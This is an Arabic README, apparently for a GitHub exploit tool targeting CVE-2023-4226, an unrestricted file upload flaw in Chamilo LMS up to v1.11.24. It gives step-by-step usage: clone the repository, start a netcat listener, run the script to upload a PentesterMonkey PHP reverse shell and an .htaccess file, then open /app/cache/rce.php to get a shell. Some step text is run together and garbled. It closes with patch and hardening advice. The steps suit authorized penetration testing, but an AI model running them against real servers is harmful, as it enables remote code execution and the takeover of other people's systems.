
ثغرة تحميل ملفات غير مقيدة في **Chamilo LMS** (<= v1.11.24).
نص برمجي بلغة بايثون يقوم بأتمتة استغلال CVE-2023-4226، وهي ثغرة أمنية لرفع الملفات بدون قيود في Chamilo LMS (<= v1.11.24). يقوم برفع غلاف ويب PHP مبني على PentesterMonkey ويقوم بإعداد .htaccess لتحقيق قشرة عكسية. المزيد من التفاصيل: إعلان STAR Labs.
/main/inc/ajax/work.ajax.php، مما يحقق تنفيذ أوامر عن بعد (RCE).ch_sid).rce.php باستخدام IP والمنفذ./main/work/work.php?cidReq=HW./main/inc/ajax/work.ajax.php لرفع rce.php و .htaccess./app/cache/rce.php).بايثون: requests, colorama.
pip install requests colorama
الملفات: rce.php (PentesterMonkey، مضمن في المستودع)، .htaccess (يتم إنشاؤه بواسطة النص البرمجي).
الشبكة: عنوان IP ومنفذ للمستمع (مثال: nc -lvnp 4444).
استنساخ المستودع:
git clone https://github.com/SkyW4r33x/CVE-2023-4226
cd CVE-2023-4226
إعطاء أذونات التنفيذ للنص البرمجي:
chmod +x CVE-2023-4226.py
تثبيت التبعيات:
pip install requests colorama
بدء المستمع في طرفية:
nc -lvnp 4444
تشغيل النص البرمجي:
./CVE-2023-4226.py
أدخل:
ch_sid.الوصول إلى غلاف الويب لبدء القشرة العكسية:
http://<chamilo>/app/cache/rce.php
مثال: http://chamilo.local/app/cache/rce.php
تحديث إلى Chamilo >= v1.11.26.
تعقيم أسماء الملفات.
حظر HTML في disable_dangerous_file().
إضافة إلى .htaccess:
RedirectMatch 403 ^/main/inc/lib/javascript/bigupload/files
Header set X-Content-Type-Options nosniff
استخدام حصري لـ الاختبارات المأذون بها. الاستخدام غير المصرح به غير قانوني.